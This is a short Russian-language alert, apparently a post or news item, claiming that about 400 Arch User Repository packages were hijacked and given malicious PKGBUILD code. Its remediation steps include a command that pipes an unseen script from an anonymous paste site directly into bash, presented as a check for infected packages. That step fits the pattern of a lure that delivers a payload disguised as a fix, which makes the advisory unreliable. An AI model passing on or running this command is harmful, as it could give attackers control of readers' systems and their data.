В репозитории AUR (Arch User Repository) зафиксирована крупная скоординированная атака: порядка 400 пользовательских пакетов были изменены и содержат вредоносный код. Инцидент обсуждается в списке рассылки Arch Linux.

• Злоумышленники получили доступ к поддержке ряда пакетов в AUR, в том числе к тем, у которых не было активного мейнтейнера, или которые имели названия, имитирующие официальные. • В изменённые PKGBUILD добавлен код, способный загрузить и выполнить вредоносную нагрузку на системе пользователя. • Установка затронутых пакетов может привести к компрометации системы: утечке данных, установке бэкдоров или запуску нежелательного ПО. • Угроза актуальна только для пакетов из AUR — официальные репозитории дистрибутивов не затронуты.

Что сделать прямо сейчас 1. Проверьте установленные пакеты из AUR: pacman -Qm 2. Запустите скрипт проверки на наличие известных заражённых пакетов: curl -s https://cscs.pastes.sh/raw/aurvulntest20260611.sh | bash 3. Если в выводе указано, что уязвимые пакеты установлены — немедленно удалите их и пересоберите из проверенного источника, предварительно изучив PKGBUILD.